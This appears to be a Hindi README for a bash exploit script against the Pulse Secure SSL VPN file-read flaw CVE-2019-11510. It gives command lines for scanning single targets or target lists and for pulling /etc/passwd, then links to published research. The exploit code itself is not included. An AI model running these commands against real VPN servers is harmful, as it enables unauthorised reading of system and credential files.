
पल्स सिक्योर SSL VPN पर मनमाना फ़ाइल पढ़ने के लिए शोषण (CVE-2019-11510)
पल्स सिक्योर SSL VPN पर आर्बिट्ररी फ़ाइल रीड के लिए एक्सप्लॉइट (CVE-2019-11510)
आप एक एकल डोमेन या डोमेन की सूची का उपयोग कर सकते हैं। डोमेन के सामने https:// शामिल करना अनिवार्य है।
Usage : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
यदि आप केवल एक्सप्लॉइट की पुष्टि करना और /etc/passwd डाउनलोड करना चाहते हैं, तो उपयोग करें :
cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd
bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
आउटपुट output/vpn.target.com/ के अंदर सहेजा जाएगा।
डेमो :
https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf